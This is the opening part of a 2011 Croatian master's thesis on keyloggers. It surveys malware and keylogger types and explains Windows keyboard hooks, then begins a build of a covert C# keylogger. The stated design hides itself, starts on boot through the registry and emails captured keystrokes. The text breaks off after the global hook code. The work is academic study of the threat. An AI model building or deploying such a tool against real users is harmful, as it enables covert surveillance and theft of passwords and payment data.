softvera - FESB

SVEUČILIŠTE U SPLITU
FAKULTET ELEKTROTEHNIKE, STROJARSTVA I
BRODOGRADNJE
DIPLOMSKI RAD
NARUŠAVANJE PRIVATNOSTI I
SIGURNOSTI KORISNIKA PRIMJENOM
MALICIOZNOG "KEYLOGGING"
SOFTVERA
Nikola Žmirić
Split, srpanj 2011.

S V E U Č I L I Š T E U S P L I T U
FAKULTET ELEKTROTEHNIKE, STROJARSTVA I
BRODOGRADNJE
Diplomski studij: Diplomski studij Računarstva
Smjer/Usmjerenje: Računarstvo
Oznaka programa: 250
Akademska godina: 2010./2011.
Ime i prezime: NIKOLA ŢMIRIĆ
Broj indeksa: 790-2009
ZADATAK DIPLOMSKOG RADA
Naslov: NARUŠAVANJE PRIVATNOSTI I SIGURNOSTI KORISNIKA
PRIMJENOM MALICIOZNOG "KEYLOGGING" SOFTVERA
Zadatak: U okviru ovog diplomskog rada zadatak studenta je istraţiti problematiku
privatnosti podataka u računalnom okruţenju s posebnim naglaskom na maliciozne
"keylogging" softvere. Pri tome je potrebno istraţiti mehanizme koje keylogger
koristi za infekciju računala, detekciju pritisnutih tipki i potajan rad. Student će
implementirati vlastitu keylogging aplikaciju koja će rezultate zapisa slati
napadaču putem mreţe. Student će implementiranu "keylogging" aplikaciju
testirati u kontoliranom laboratorijskom okruţenju.
Prijava rada: 28.02.2011.
Rok za predaju rada: 20.09.2011.
Rad predan:
Predsjednik
Odbora za diplomski rad: Mentor:
Dr.sc. Sven Gotovac, red. prof. Dr.sc. Mario Čagalj, izv. prof.

SADRŢAJ:
1. UVOD .................................................................................................................................... 1
2. MALWARE (maliciozni software) ..................................................................................... 2
2.1. Osnovne vrste malware-a .............................................................................................. 2
2.2. Pojam keylogger ............................................................................................................ 3
2.3. Zašto keyloggeri predstavljaju prijetnju? ................................................................... 4
3. VRSTE KEYLOGGERA .................................................................................................... 7
3.1. Softverski keyloggeri ..................................................................................................... 7
3.2. Hardverski keyloggeri ................................................................................................... 8
4. RAD KEYLOGGERA ....................................................................................................... 12
4.1. Windows Hooks ........................................................................................................... 13
4.2. Lanac udica (hook chain) ............................................................................................ 14
4.3. SetWindowsHookEx ..................................................................................................... 15
5. IZRADA KEYLOGGERA ................................................................................................ 16
5.1. Intervalno izvršavanje ................................................................................................. 17
5.2. Klasa Hook.cs ............................................................................................................... 17
5.3. Detekcija prisutnosti korisnika .................................................................................. 20
5.4. Skriveni izbornik ......................................................................................................... 21
5.5. Dodavanje u startup modifikacijom registra ............................................................ 22
5.6. Screenshot..................................................................................................................... 23
5.7. Spremanje podataka.................................................................................................... 23
5.8. Slanje log datoteke e-mailom ...................................................................................... 25
5.9. Brzi prikaz log datoteke .............................................................................................. 26
5.10. Infekcija keyloggerom ............................................................................................... 28
5.11. Primjena keyloggera .................................................................................................. 30
6. ZAŠTITA OD KEYLOGGERA ....................................................................................... 34
7. ZAKLJUČAK ..................................................................................................................... 37
8. LITERATURA ................................................................................................................... 38

1. UVOD
U današnje vrijeme informacijska tehnologija se sve brţe razvija i sve više olakšava ţivot
ljudima. TakoĎer, svakodnevno poslovanje pojedinaca i velikih kompanija je uvelike
olakšano. Uz brojne prednosti koje današnja razina informatizacije nudi potrebno je uočiti da
tok informacija nije u potpunosti siguran. Postoje mnogi načini napada na privatnost i kraĎe
povjerljivih podataka kao i veliki broj zloćudnih programa koji to omogućuju.
U ovom diplomskom radu cilj je predstaviti keyloggere, zloćudne programe koji predstavljaju
veliku prijetnju privatnosti i sigurnosti, a čine to praćenjem korisnikovih unosa znakova na
tipkovnici. Nadalje, bit će opisana izrada jednostavnog keyloggera u kojem će biti
implementirane osnovne funkcionalnosti i metode napada. U prvom poglavlju bit će opisani
glavni predstavnici malware-a (malicioznog softvera) kao i sam pojam "keylogger". Drugo
poglavlje će se baviti podjelom keyloggera na softverske i hardverske kao i svakom od
njihovih podvrsta. U trećem poglavlju bit će predstavljeni principi rada svakog keyloggera i
programski mehanizmi koje koriste. Sljedeće poglavlje će dati potpun uvid u postupak izrade
keyloggera. Bit će opisane sve funkcionalnosti te programski kod koji ih omogućava. TakoĎer
će biti opisan i sam princip rada keylogger aplikacije od početne infekcije računala do
uspješne kraĎe povjerljivih podataka. Najčešće metode zaštite korisnika od napada
keylogggerom bit će opisane u završnom poglavlju ovog diplomskog rada.
1

2. MALWARE (maliciozni software)
Pojam malware dolazi od engleskog izraza malicious software (hrv. zloćudni softver) i
označava sve vrste programskih aplikacija koje na bilo koji način mogu ugroziti računalni
sustav i čine to potajno. Najveću opasnost predstavljaju za podatke na računalu ali ponekad
mogu izazvati i fizičku štetu na hardverskim komponentama [1] [2].
Posljednjih godina se moţe zapaziti nagli rast u broju detekcija zloćudnog softvera što se
moţe vidjeti na grafu (Slika 2.1.).
Slika 2.1. Broj prikupljenih jedinstvenih uzoraka malware-a od strane
2.1. Osnovne vrste malware-a
Trojanski konji
internet portala AV-Test.org [3]
Ovakvi programi spadaju pod najčešću i najopasniju vrstu malware-a. Trojanski konj se ne
koristi za infekciju i uništavanje datoteka, već se koristi u svrhu kontroliranja ţrtvinog
računala s udaljene lokacije. Trojanski konj se na prvi pogled čini bezopasnim, čak i
korisnim programom kojeg uglavnom korisnik sam pokrene. Nakon pokretanja, odnosno
instalacije takvog programa napadač dobiva pristup računalu, a time i potencijalno, svim
podacima na istome. Za razliku od računalnih virusa i crva, trojanski konj se ne replicira i ne
širi samostalno [1] [2].
2

Virusi
Glavna im je svrha zaraziti računalo modificiranjem postojećih datoteka, replicirati se, te
proširiti na druga računala. Ponašaju se kao pravi paraziti koji trebaju domaćina da bi se
nadalje širili. Glavni medij širenja im je Internet kako bi zarazili što više računala.
Crvi (eng. worms)
Slični su računalnim virusima osim u tome što ne trebaju domaćina da bi zarazili sljedeće
računalo. Crvi se samostalno repliciraju i šalju svoje kopije ostalim računalima na mreţi.
Skoro uvijek uzrokuju neku štetu na mreţi, makar samo zagušenjem. Kompjuterski crvi
predstavljaju ozbiljnu prijetnju velikim računalnim mreţama.
RATS (Remote Access Trojan)
Jedan je od najopasnijih tipova malware-a. Sličan je Trojanskom konju. Po instalaciji RAT-a
na računalo napadač ima potpun nadzor nad sustavom što mu omogućava infekciju lokalnih
datoteka, gašenje računala, instalaciju keyloggera itd.
Adware (Advertisement-supported software)
Glavna im je svrha prikaz oglasa na računalu. MeĎutim, mogu sadrţavati štetne viruse i
programe za špijunaţu.
2.2. Pojam keylogger
Pojam "keylogger" je sam po sebi neutralan i označava funkciju nekog programa. Većina
izvora definira keylogger kao softverski program koji potajno prati i sprema svaki pritisak
tipke na tipkovnici. Takva definicija nije u potpunosti točna zbog toga što keylogger ne mora
biti softverski program, već moţe biti i ureĎaj, odnosno hardverski keylogger (kao što će biti
pokazano poslije). Iako se mnogo rjeĎe koriste, kada se priča o računalnoj sigurnosti vaţno je
istaknuti njihovo postojanje. TakoĎer, funkcionalnosti keyloggera mogu biti (često i jesu)
mnogo veće od jednostavne pohrane pritisnutih tipki. Vrste keyloggera i njihove
funkcionalnosti bit će detaljnije opisane u nastavku ovog diplomskog rada.
Legitimni programi mogu imati keylogging funkcije koje se mogu koristiti pri pozivu nekih
programskih funkcionalnosti koristeći "hotkeys" (prečaci ili kombinacije tipaka). Postoji
3

mnoštvo legitimnog softvera koji omogućava administratorima praćenje zaposlenika tijekom
radnog vremena ili korisnicima da prate aktivnosti gostiju na vlastitim računalima. MeĎutim,
tanka je granica izmeĎu opravdanog praćenja i špijunaţe. Legitimni softver se često
zlonamjerno koristi za kraĎu korisnikovih tajnih informacija kao što su lozinke, brojevi
kreditnih kartica, itd.
Većina današnjih keyloggera se smatra legitimnim softverom ili hardverom, te su dostupni za
kupnju na otvorenom trţištu. Razvojni programeri i trgovci softverom nude dug niz svrha u
koje je primjereno koristiti keyloggere:
- Sigurnost poduzeća: praćenje da li se računala koriste u svrhe nepredviĎene opisom
radnog mjesta;
- Sigurnost poduzeća: korištenje keyloggera u svrhu praćenja ključnih riječi i fraza
povezanih s poslovnim tajnama čije bi otkrivanje naškodilo kompaniji;
- Roditeljska kontrola: roditelji mogu pratiti što njihova djeca rade na Internetu, te mogu
biti obaviješteni o pristupu internetskim stranicama s neprikladnim sadrţajem;
- Ljubomorni supruţnici ili partneri mogu koristiti keylogger za praćenje radnji njihove
bolje polovice;
- ProvoĎenje zakona: kao jedna od metoda prikupljanja dokaza pri kriminalnoj istrazi.
Poviše navedeni razlozi za korištenje keyloggera su više subjektivni nego objektivni; sve
navedene situacije se mogu razriješiti drugim metodama. Svaki legitimni keylogging program
se svejedno moţe koristiti sa zlim i kriminalnim namjerama. Danas se keyloggeri poglavito
koriste u takve, zle namjere, da bi se krali korisnički tajni podaci uglavnom vezani za
internetsko plaćanje. Upravo u tu svrhu tvorci zloćudnih programa neprestano pišu nove
keyloggere.
Nadalje, mnogi keyloggeri se skrivaju u računalnom sustavu (rootkit funkcionalnost) što ih
čini punokrvnim trojanskim programima.
2.3. Zašto keyloggeri predstavljaju prijetnju?
Za razliku od ostalih zlonamjernih programa, keyloggeri ne predstavljaju prijetnju
računalnom sustavu. Unatoč tome, velika prijetnja su korisnicima računalnog sustava pošto se
mogu koristiti za presretanje lozinki i ostalih povjerljivih informacija unesenih preko
4

tipkovnice, a i drugih ulaznih ureĎaja. Kao rezultat, cyber kriminalci mogu doći do PIN
kodova i brojeva računa raznih sustava e-plaćanja, lozinki online korisničkih računa, e-mail
adresa itd...
Jednom kad napadač doĎe do povjerljivih korisničkih informacija s lakoćom moţe izvršiti
transfer novca s korisničkog e-računa na svoj. Naţalost, pristup povjerljivim podacima moţe
katkad imati mnogo ozbiljnije i dalekoseţnije posljedice od gubitka novca. Keyloggeri se
mogu koristiti kao alat, kako za industrijsku, tako i za političku špijunaţu i tako dovesti do
otkrivanja tajnih drţavnih informacija što nadalje moţe dovesti do kompromitiranja sigurnosti
drţavnih organizacija (npr. kraĎa privatnih enkripcijskih ključeva).
Na Slici 2.2. je prikazan scenarij napada gdje napadač A (eng. attacker) vrši napad na
korisnike banke - ţrtva, Vi (eng. victim). Da bi zarazio ţrtvu keyloggerom koristi razne
tehnike od slanja spam e-maila sa zloćudnom aplikacijom u privitku, ubacivanja keyloggera
kada ţrtva pristupi zloćudnoj internet stranici do ručne instalacije programa.
Slika 2.2. Prikaz napada na korisnike banke i dohvata povjerljivih podataka [4]
5

Ţrtva sada ima keylogger instaliran na svome računalu koji prati njezine unose znakova sa
tipkovnice. Ţrtva V1 pristupa svom bankovnom računu na stranici internet bankarstva P1
putem mreţe autentifikacijom, odnosno unošenjem povjerljivih podataka putem tipkovnice
(broj bankovnog računa, lozinka itd.). Kada "uhvati" povjerljive podatke keylogger aplikacija
ih šalje napadaču na e-mail ili FTP server (eng. dropzone). Po primanju povjerljivih podataka
napadač ima mogućnost pristupa ţrtvinom bankovnom računu unošenjem istih.
Osim keyloggera najčešće metode koje se koriste pri cyber prijevarama (eng. cyber fraud) su:
- Phishing: vrsta pokušaja dohvata tajnih informacija (npr. korisnička imena, lozinke i
brojevi kreditnih kartica) gdje se napadač pretvara da je legitiman entitet elektroničke
komunikacije. Najčešće se provodi e-mailom i uglavnom navodi korisnike da unesu
svoje informacije na zlonamjernoj internet stranici koja svojim izgledom skoro
identično imitira legitiman internet servis (PayPal, Facebook, Gmail itd.).
- Social engineering: obuhvaća razne metode manipuliranja i varanja korisnika u svrhu
otkrivanja povjerljivih informacija.
Korisnici koji su svjesni sigurnosnih pitanja mogu se lako zaštititi protiv phishing napada tako
da ignoriraju takve e-mailove i ne unose osobne podatke na sumnjivim internet stranicama.
Teţe je, meĎutim, zaštititi se od keyloggera; jedina učinkovita metoda je korištenje
odgovarajuće sigurnosne zaštite u obliku specijaliziranog programa za otkrivanje takvih
prijetnji iz razloga što je nemoguće da korisnik primijeti da je keylogger instaliran na
njegovom računalu.
6

3. VRSTE KEYLOGGERA
Moţe se reći da su keyloggeri softverski ili hardverski entiteti koji obavljaju keylogging
funkciju (eng. keystroke logging). Nadalje, keylogging moţemo definirati kao proces praćenja
(i pohranjivanja) tipki pritisnutih na tipkovnici, u pravilu na tajan način tako da korisnik nije
svjestan da se njegove radnje prate. Postoji velik broj keylogging metoda, od softverskih i
hardverskih, do elektromagnetskih i onih baziranih na zvučnoj analizi...
3.1. Softverski keyloggeri
To su softverski programi dizajnirani za rad na računalu. Oni se izvode skriveni od oka
korisnika i presreću sve pritisnute tipke (eng. keystrokes) na računalu na kojem su pokrenuti.
Nadalje, softverski keylogger u odreĎenim intervalima šalje "uhvaćene" tipke napadaču (e-
mail, FTP server itd.).
Razlikujući ih po njihovoj tehničkoj konstrukciji i načinu rada keyloggere moţemo podijeliti
na pet kategorija [5][6]:
- Hypervisor-based: Keylogger se moţe smjestiti unutar virtualnog računala (eng.
malware hypervisor) gdje se u principu izvodi "ispod" operacijskog sustava, koji pak
ostaje nepromijenjen. Time efektivno postaje virtualni stroj (eng. virtual machine) i ne
nalazi se na samom operativnom sustavu, a upravo to ga čini teškim za pronaći.
- Kernel-based: Ovakvi keyloggeri su veoma efektivni i teški za iskorijeniti. Nalaze se
na razini kernela zbog čega ih je teško detektirati. Često se implementiraju kao
rootkitovi i tako prevare sustav koji ih vidi kao svoj sastavni dio. Kao dio kernela
ovakvi programi nemaju prepreke za pristup svim hardverskim unosima. Često se
implementiraju kao driveri same tipkovnice i time im je direktno dozvoljen pristup
unesenim znakovima čak i prije nego što dospiju do operacijskog sustava. Njihova
kompleksnost ih čini veoma teškim za isprogramirati pa se i rjeĎe koriste.
- API-based: Ovakvi keyloggeri se "zakače" (eng. hook) na API (Application
programming interface) pa ih operacijski sustav obavještava svaki put kad se pritisne
tipka na tipkovnici, a oni nadalje jednostavno pohranjuju te znakove. Koriste se API
funkcije kao što su GetAsyncKeyState(), GetForegroundWindow() za dohvat stanja
7

tipkovnice i pretplatu na dogaĎaje s tipkovnice (eng. keyboard events). Ovakvi
keyloggeri su lakši za isprogramirati od prethodnih pa se i češće koriste.
- Form grabbing based: Keyloggeri bazirani na dohvatu formi prate dogaĎajne funkcije
Internet preglednika (eng. browser event functions) te biljeţe povjerljive informacije
sa predanih web obrazaca. Informacije se biljeţe prije njihove daljnje predaje na
Internet i time se zaobilazi HTTPS enkripcija.
- Packet analyzers: Keyloggeri koji hvataju i analiziraju pakete mreţnog prometa
povezane s HTTP POST dogaĎajima u svrhu dohvata neenkriptiranih lozinki.
Softverski keyloggeri se mogu unaprijediti dodatnim funkcionalnostima kako bi došli do
korisnikovih informacija bez oslanjanja na pritiske tipki sa tipkovnice kao jedini način unosa.
Neke od dodatnih funkcionalnosti:
- Clipboard logging – keylogger hvata sve informacije koje je korisnik kopirao u trenutni
spremnik (eng. clipboard).
- Screen logging (screenshots) – pohranjuje se slika trenutnog stanja na ekranu da bi se
došlo do bilo kakvih grafičkih informacija. Moguće je hvatanje cijelog ekrana, prozora
samo jedne aplikacije ili čak samo područja oko pokazivača miša. Slike se hvataju
periodično ili kao rezultat korisnikovih akcija (npr. klik mišem).
- Hvatanje teksta unutar kontrola – Windows API omogućava dohvat text svojstva nekih
kontrola što znači da je tako moguće doći do lozinki čak i ako su skrivene iza maske
(uglavnom znak asterisk).
- Hvatanje svakog otvorenog programa, foldera ili prozora kao i screenshot svake
posjećene internet stranice.
- Hvatanje upita internet pretraživačima, razgovora instant messenger aplikacija i
ostalih Internet aktivnosti.
3.2. Hardverski keyloggeri
Hardverski keyloggeri nisu ovisni o instaliranom softveru te se nalaze kao ureĎaj u
računalnom sustavu. Najčešće su implementirani kao ureĎaj prispojen izmeĎu tipkovnice i
računala. Oni biljeţe svu aktivnost tipkovnice i spremaju u vlastitu internu memoriju.
8

Hardverski keyloggeri imaju prednost nad softverskim jer su u stanju pratiti aktivnosti od
trena kad je računalo upaljeno i time presresti lozinke za BIOS ili eventualno korišteni
enkripcijski softver.
Svi hardverski keyloggeri imaju sljedeće komponente:
- mikrokontroler: prevodi slijed podataka izmeĎu tipkovnice i računala, obraĎuje ga i
prosljeĎuje svojoj internoj memoriji
- memorijski ureĎaj: najčešće flash memorija u koju se pohranjuju snimljeni podaci;
mogu biti memorijskog kapaciteta od jednog kilobajta do nekoliko megabajta
Moţemo razlikovati sljedeće osnovne tipove hardverskih keyloggera:
- Obični hardverski keylogger: Sklop koji se spaja izmeĎu tipkovnice i računala (Slika
3.1.). Presreće svu aktivnost tipkovnice, odnosno sve pritisnute tipke te ih sprema u
svoju internu memoriju. Ovakav keylogger nije ovisan o trenutnom operacijskom
sustavu stoga ne dolazi u sukob s ijednim programom na računalu i time je nevidljiv
svim specijaliziranim antivirusnim programima.
Slika 3.1. Hardverski keylogger
- Beţični keylogger sniffer: Prikuplja podatkovne pakete koji se odašilju izmeĎu beţične
tipkovnice i njenog prijamnika, te pokušava "probiti" enkripcijski ključ kojim se
osigurava beţična komunikacija izmeĎu ta dva ureĎaja.
- Firmware: BIOS računala je odgovoran za upravljanje dogaĎajima tipkovnice te se
moţe reprogramirati tako da biljeţi sve pritiske tipki i dalje ih obraĎuje. Pošto se
BIOS svakog računala nalazi na postojanom memorijskom ureĎaju takva
implementacija spada pod hardverske keyloggere.
9

- Prekrivanje tipkovnice (eng. keyboard overlay): Laţna tipkovnica se postavlja na
izvornu tipkovnicu tako da svaku pritisnutu tipku registrira i laţna i izvorna tipkovnica
(Slika 3.2.). Često se ovakvim metodama koriste kriminalci za kraĎu PIN-ova
postavljanjem laţnih tipkovnica na bankomate. Laţni ureĎaj je dizajniran tako da
izgleda kao sastavni dio bankomata što ga čini teško primjetnim.
Slika 3.2.Bankomat sa instaliranom lažnom tipkovnicom i bez nje
- Akustični keylogger: Radi na principu pretvaranja zvuka u podatke. Temelji se na
spoznaji da svaka tipka na tipkovnici kada se pritisne proizvodi jedinstven zvuk,
odnosno zvučni uzorak (Slika 3.3.). U tom slučaju oslušni ureĎaj moţe detektirati
blage varijacije pri pritisku različitih tipki na tipkovnici. Ovakav ureĎaj zahtijeva
uzorak od barem tisuću pritisaka tipki da bi proizveo prihvatljive rezultate. Da bi se
ustanovilo koja je tipka pritisnuta koriste se razne statističke metode. Učestalost
ponavljanja sličnih akustičnih karakteristika, vrijeme izmeĎu pritiska dvije različite
tipke, kao i najvjerojatniji jezik u kojem korisnik piše, zajedno doprinosi analizi i
daljnjem mapiranju zvuka u slova.
Slika 3.3. Audio signal pritiska jedne tipke [7]
10

- Elektromagnetske emisije: Moguće je detektirati elektromagnetske emisije koje
proizvodi tipkovnica bez fizičkog kontakta s istom. Ova metoda nije široko
primjenjiva već je pokazala rezultate samo u laboratorijima. Švicarski znanstvenici su
testirali 11 različitih USB, PS/2 i laptop tipkovnica u polugluhoj komori (eng. semi-
anechoic chamber), te pokazali da su sve ranjive na ovu vrstu detekcije. Za detekciju
specifičnih frekvencija emitiranih iz tipkovnica koristi se širokopojasni prijamnik.
- Optičko nadziranje: Iako nije keylogger u uţem smislu riječi, ovakav se pristup
takoĎer moţe pokazati korisnim za dobavljanje lozinki ili PIN brojeva. Primjer sličnog
pristupa je pokazan u praktičnom dijelu ovog diplomskog rada.
11

4. RAD KEYLOGGERA
Glavna ideja iza keyloggera je stati izmeĎu dvije karike u nizu dogaĎaja od trena kada se
tipka na tipkovnici pritisne do prikaza informacije na ekranu. Kako je već opisano, to se moţe
postići bilo video nadzorom, hardverskom modifikacijom same tipkovnice, umetanjem
ureĎaja izmeĎu računala i tipkovnice, modifikacijom drivera, modifikacijom kernela ili pak,
najčešće, zahtijevanjem informacija od tipkovnice koristeći standardne API metode.
Najproširenije metode za praćenje unosa znakova su:
- Sistemska udica (eng. hook) koja korištenjem WinAPI metoda (SetWindowsHook)
presreće dojavu o pritisnutoj tipki
- Ciklički zahtjev tipkovnici (eng. cyclical information keyboard request) za
informacijom o pritisnutoj tipki. Implementirano WinAPI metodama
Get(Async)KeyState ili GetKeyboardState
- Koristeći filter driver za tipkovnicu. Vrsta drivera koji prvi prima informaciju o pritisku
tipke te je dalje prosljeĎuje driverima operacijskog sustava.
Slijedi prikaz različitih vrsta keyloggera ovisno o vrsti implementirane metode rada:
Slika 4.1. Zastupljenost metoda za praćenje unesenih znakova[8]
U zadnje vrijeme sve su više prisutni keyloggeri koji koriste razne metode maskiranja svojih
datoteka da bi izbjegli detekciju. Te metode spadaju pod tzv. rootkit metode, odnosno skup
programa kojima je moguće sakriti datoteke i pokrenute procese od operacijskog sustava.
12

Dvije su glavne rootkit metode:
- maskiranje u korisničkom načinu rada (eng. user mode masking)
- maskiranje u administratorskom načinu rada (eng. kernel mode masking)
Sljedeći graf prikazuje učestalost keyloggera s obzirom na korištenu metodu skrivanja:
Slika 4.2. Zastupljenost metoda za skrivanje [8]
Što je keylogger teţi za isprogramirati i što je teţa metoda koju koristi to je manje zastupljen
pri općoj upotrebi, a više se koristi u specifične svrhe (najčešće ilegalne). Kao što se moţe
vidjeti na grafovima na Slici 4.1. i Slici 4.2. keyloggeri koji koriste filter driver metodu za
"hvatanje" pritisnutih tipki i kernel metodu za skrivanje najrjeĎe se koriste. MeĎutim, upravo
takve keyloggere koriste cyber kriminalci pri specifičnim napadima na velike kompanije.
4.1. Windows Hooks
Windows Hooks (u daljnjem tekstu - udica) je mehanizam unutar Windows API-ja
(application programming interface) pomoću kojega aplikacija moţe presresti sistemske
dogaĎaje (eng. events) prije nego doĎu do ciljne aplikacije. Takvi dogaĎaji uključuju poruke
meĎu procesima, akcije miša i pritiske tipki na tipkovnici. Takav mehanizam moţe reagirati
na dogaĎaje, mijenjati ih ili pak odbaciti. Udice umanjuju performanse sustava jer je potrebna
dodatna procesorska obrada pri svakoj od sistemskih poruka [9].
Udice nude velike mogućnosti: obrada ili izmjena svake sistemske poruke; snimanje ili
reprodukcija dogaĎaja s tipkovnice ili miša; sprječavanje poziva drugih filtara ...
13

Neke od primjena sistemskih udica su:
- Praćenje poruka pri debuggiranju
- Pruţanje podrške za snimanje i reproduciranje makro naredbi
- Pruţanje podrške za help key (F1)
- Simulacija unosa sa miša i tipkovnice
- Implementacija aplikacije za osposobljavanje pomoću računala (eng. computer-based
training, CBT)
U osnovi, postoje dvije vrste udica:
- Globalna udica (eng. Global hook, System-wide Hook): presreće poruke svih aplikacija
u sustavu
- Lokalna udica (eng. Local Hook, Thread-Specific Hook): presreće poruke samo
odreĎenih, unaprijed specificiranih procesa
Funkcije koje primaju dogaĎaje zovu se Hook Procedure i klasificiraju se po vrsti dogaĎaja
koje presreću. Na primjer, hook procedura moţe primati sve dogaĎaje s tipkovnice (pritisak
tipke). Da bi operativni sustav mogao pozvati hook proceduru, ona mora biti instalirana,
odnosno zakačena na udicu. Proces kačenja jedne ili više hook procedura na udicu naziva se
postavljanje udice (eng. setting a hook). Ako udica ima na sebi više od jedne hook procedure,
operativni sustav stvara lanac hook procedura. Posljednje instalirana procedura se nalazi na
početku lanca dok se prva instalirana procedura nalazi na kraju lanca.
Za izmjenu i pristup postojećim udicama, aplikacije koriste SetWindowsHookEx i
UnhookWindowsHookEx API funkcije.
4.2. Lanac udica (hook chain)
Sustav omogućava velik broj različitih vrsta udica. Svaka vrsta omogućava pristup različitom
aspektu mehanizma za upravljanje porukama. Na primjer, aplikacija moţe koristeći
WH_MOUSE udicu pratiti promet poruka miša.
U operativnom sustavu se ostvaruje lanac udica za svaku vrstu udice. Moţe se reći da je lanac
udica u biti, lista pointera na aplikacijski definirane pozivne funkcije – hook procedure.
14

Kad se dogodi poruka asocirana s odreĎenom vrstom udice, sustav prosljeĎuje tu poruku
svakoj od sistemskih udica (hook procedura) koje se nalaze na lancu, od prve prema
posljednjoj [9].
Za instalaciju hook procedure unutar hook lanca koristi se API funkcija SetWindowsHookEx.
Funkcija SetWindowsHookEx uvijek instalira hook proceduru na početak lanca. Kad doĎe do
dogaĎaja kojeg prati udica, sustav poziva proceduru s početka lanca koja je asocirana s
udicom. Svaka hook procedura u lancu odlučuje hoće li proslijediti dogaĎaj sljedećoj
proceduri. Hook procedura prosljeĎuje dogaĎaj sljedećoj proceduri pozivom API funkcije
CallNextHookEx.
4.3. SetWindowsHookEx
Moţe se reći da je funkcija SetWindowsHookEx jedna od najvaţnijih funkcija pri izradi
keyloggera jer omogućava njegovu temeljnu funkcionalnost, a to je registracija svih
pritisnutih tipki tipkovnice. Funkcija SetWindowsHookEx se koristi za instalaciju aplikacijski
definirane hook procedure unutar hook lanca.
Slijedi detaljniji opis sintakse funkcije i prosljeĎenih joj vrijednosti [10].
HHOOK WINAPI SetWindowsHookEx(
__in int idHook,
__in HOOKPROC lpfn,
__in HINSTANCE hMod,
__in DWORD dwThreadId
);
- idHook: Označava vrstu sistemske udice koja se postavlja. U našem slučaju idHook ima
vrijednost 13 što je identifikacijska oznaka za tipkovnicu, odnosno WH_KEYBOARD_LL
- lpfn: Označava pointer na hook proceduru koja preuzima dogaĎaj
- hMod: Označava handle instance aplikacije koja postavlja udicu stoga se vrijednost
postavlja na API.GetModuleHandle(mod.ModuleName)
- dwThreadId: Označava identifikacijsku oznaku trenutnog procesa. Postavljanjem
vrijednosti na 0 udica postaje globalna.
Dakle, konačni poziv funkcije, a time i postavljanje udice izgleda ovako:
API.SetWindowsHookEx(13, hd, API.GetModuleHandle(mod.ModuleName), 0);
15

5. IZRADA KEYLOGGERA
U sklopu ovog poglavlja bit će prikazan primjer jednostavnog keyloggera. TakoĎer će biti
detaljnije objašnjen proces stvaranja istoga. Nadalje, bit će opisane sve funkcionalnosti i
programski kod koji ih omogućava.
Dakle, cilj je napisati keylogger aplikaciju koja će imati osnovne karakteristike i
funkcionalnosti svakog keyloggera. Keylogger će dohvaćati sve korisnikove unose s
tipkovnice. Aplikacija će biti skrivena od korisnika i pokretat će se pri svakom paljenju
računala. Svi dohvaćeni podaci će se spremati u tekstualnu datoteku čiju lokaciju moţemo
sami odrediti. Dobivena tekstualna datoteka (log file) će se slati e-mailom na ţeljenu e-mail
adresu.
Osim osnovnih funkcionalnosti cilj je implementirati i neke od naprednijih karakteristika koje
keylogger moţe imati.
Osnovne funkcionalnosti koje će biti implementirane:
- skrivanje prisutnosti od korisnika
- hvatanje pritisnutih tipki
- spremanje podataka na ţeljeno mjesto na disku u obliku tekstualnog log fajla
- slanje podataka mailom
- pokretanje pri svakom paljenju računala (modifikacija registra)
Nadalje, u ovoj praktičnoj provedbi izrade keyloggera bit će demonstrirane neke od dodatnih
funkcionalnosti koje keylogger moţe imati:
- skriveni izbornik
- mogućnost detekcije ključnih riječi i djelovanja sukladno tome
- hvatanje slike trenutnog stanja na zaslonu (eng. screenshot) i njezino slanje mailom
- trenutni prikaz uhvaćenog teksta na zaslonu u svrhu eventualnog optičkog nadziranja
- detekcija prisutnosti korisnika
- neprimjetna instalacija
16

5.1. Intervalno izvršavanje
Osim samog praćenja i spremanja pritisnutih tipki osnova svakog keyloggera je upravo
intervalno izvršavanje. Naime, svaka funkcionalnost keyloggera se mora izvršavati u
intervalima. Moguća alternativa je isključivo samo reagiranje na korisnikove akcije.
Sve osnovne funkcije praćenja korisnikovih akcija izvršavaju se u jednakim vremenskim
intervalima.
Osnova programskog koda koji omogućava intervalno izvršavanje su metode Timer() i
OnTimedEvent() koje efektivno predstavljaju štopericu i dogaĎaj koji će se intervalno
izvršavati.
private static System.Timers.Timer aTimer;
GC.KeepAlive(aTimer);
aTimer = new System.Timers.Timer(10000);
aTimer.Elapsed += new ElapsedEventHandler(OnTimedEvent);
aTimer.Enabled = true;
Poviše prvo stvaramo štopericu, odnosno Timer objekt kojega štitimo od garbage collectora
metodom GC.KeepAlive(). Zatim specificiramo duljinu intervala u milisekundama i dogaĎaj.
Slijedi metoda OnTimedEvent() unutar koje vršimo provjeru mirovanja (bit će kasnije
opisano) popraćenu pozivima ţeljenih funkcija.
5.2. Klasa Hook.cs
Osnova svakog keyloggera je mogućnost detekcije pritisnutih tipki. Ta funkcionalnost je u
ovom primjeru ostvarena unutar zasebne klase Hook.cs. Osluškivanje dogaĎaja s tipkovnice je
izvedeno korištenjem globalne udice. Osnova korištene metode je API funkcija
SetWindowsHookEx( ) [9] [10] [11].
Slijedi pregled glavnih dijelova klase Hook.cs (potpuni programski kod se moţe vidjeti na
priloţenom CD-u).
Započinje se deklaracijom korištenih metoda koje se nalaze unutar User32.dll datoteke. Za
njihovu deklaraciju se koristi atribut DllImport().
17

Sljedeće metode predstavljaju okosnicu u radu keyloggera.
- SetWindowsHookEx – omogućava instalaciju aplikacijski definirane hook procedure
unutar hook lanca
- UnhookWindowsHookEx – uklanja hook proceduru iz hook lanca i time oslobaĎa
sistemske resurse pri zatvaranju keylogger aplikacije
- CallNextHookEx – poziva sljedeću udicu u nizu tako da ostale aplikacije koje se koriste
udicama mogu ispravno raditi (npr. Windows shortcuts)
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
public static extern IntPtr SetWindowsHookEx(
int idHook,
HookDel lpfn,
IntPtr hMod,
uint dwThreadId);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool UnhookWindowsHookEx(
IntPtr hhk);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
public static extern IntPtr CallNextHookEx(
IntPtr hhk,
int nCode,
IntPtr
wParam,
IntPtr lParam);
Svaka tipka na tipkovnici kada se pritisne generira tzv. scan code. Driver od tipkovnice
prevodi, odnosno mapira svaki scan code u virtual-key code, odnosno broj koji jednoznačno
predstavlja svaku pritisnutu tipku.
Slijedi deklaracija enumeration konstante gdje se simboličnom nazivu pritisnute tipke
pridodjeljuje odgovarajuća heksadecimalna vrijednost.
public enum VK
{
VK_BACK = 0X08, //Backspace
18

}
VK_RETURN = 0X0D, //Enter
